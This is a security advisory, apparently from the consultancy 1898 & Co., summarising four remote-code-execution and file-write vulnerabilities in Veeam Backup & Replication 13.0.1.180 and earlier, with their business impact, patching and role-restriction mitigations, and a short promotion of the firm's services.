Critical Vulnerabilities in Veeam Backup & Replication Software

Recent security updates from Veeam have addressed multiple vulnerabilities in its Backup & Replication software, including a critical flaw that could lead to remote code execution (RCE). The most severe of these, tracked as CVE-2025-59470, has a CVSS score of 9.0 and allows a Backup or Tape Operator to execute code remotely as the postgres user by sending a malicious interval or order parameter. This vulnerability highlights the importance of securing privileged roles within organizations to prevent misuse.

In addition to the critical vulnerability, three other significant flaws have been identified in the same product. These include CVE-2025-55125, which allows RCE as root through a malicious backup configuration file; CVE-2025-59468, enabling RCE as the postgres user via a malicious password parameter; and CVE-2025-59469, which permits file writing as root. All these vulnerabilities affect Veeam Backup & Replication version 13.0.1.180 and earlier versions.

Veeam has released patches in version 13.0.1.1071 to address these issues. Although there is no current evidence of these vulnerabilities being exploited in the wild, the history of exploitation in similar software underscores the urgency for users to apply these updates promptly. Organizations are advised to follow Veeam's recommended Security Guidelines to mitigate potential exploitation risks.

Threats and Vulnerabilities

The critical vulnerability CVE-2025-59470 poses a significant risk due to its potential for remote code execution by privileged users, such as Backup or Tape Operators. This flaw could lead to unauthorized access and control over systems, potentially affecting data integrity and availability. The high CVSS score of 9.0 reflects the severity of this threat.

CVE-2025-55125 is another serious vulnerability that allows RCE as root by creating a malicious backup configuration file. This could enable attackers to gain elevated privileges and execute arbitrary commands, posing a substantial risk to system security and data confidentiality.

CVE-2025-59468 involves RCE as the postgres user through a malicious password parameter, which could compromise database security and lead to unauthorized data access or manipulation. This vulnerability is particularly concerning for environments where database integrity is critical.

CVE-2025-59469 allows file writing as root, which could be exploited to alter system files or introduce malicious code, potentially leading to system instability or further exploitation. The ability to write files with root privileges makes this vulnerability a notable threat.

Client Impact

The identified vulnerabilities could lead to significant operational disruptions if exploited, including unauthorized access to sensitive data and potential data loss. Organizations may face financial consequences due to downtime or data breaches, alongside reputational damage if customer data is compromised.

From a compliance perspective, these vulnerabilities could result in regulatory challenges, especially for industries with stringent data protection requirements. Failure to address these issues promptly may lead to audits or penalties under regulations such as GDPR or HIPAA.

Mitigations

To mitigate the risks associated with these vulnerabilities, clients should take the following actions:

1. Apply the latest security updates from Veeam for Backup & Replication software version 13.0.1.1071 immediately.
2. Review and restrict privileges for Backup and Tape Operator roles to minimize potential misuse.
3. Implement Veeam's recommended Security Guidelines to reduce exploitation opportunities.
4. Conduct regular security audits and vulnerability assessments to identify and address potential weaknesses.
5. Monitor systems for unusual activity that may indicate attempted exploitation of these vulnerabilities.

By taking these steps, organizations can significantly reduce their exposure to these threats and enhance their overall security posture. It is crucial for clients to remain vigilant and proactive in applying security updates and following best practices for role management and system monitoring.

1898 & Co. Response

1898 & Co. is actively addressing the current threat landscape by offering specialized services designed to help clients secure their Veeam Backup & Replication environments. Our team provides tailored vulnerability assessment services to identify and mitigate risks associated with these newly discovered flaws.

We are updating our security protocols to incorporate the latest threat intelligence and best practices for managing privileged roles within organizations. Our collaborative efforts with industry allies and government agencies ensure that we remain at the forefront of cybersecurity developments.

Our ongoing research and threat intelligence gathering activities enable us to provide clients with timely insights into emerging threats and effective mitigation strategies. We have successfully assisted numerous clients in implementing robust security measures that protect against similar vulnerabilities, demonstrating our commitment to delivering high-quality cybersecurity solutions.

Sources

1. Veeam Security Bulletin
2. CVE Details for CVE-2025-59470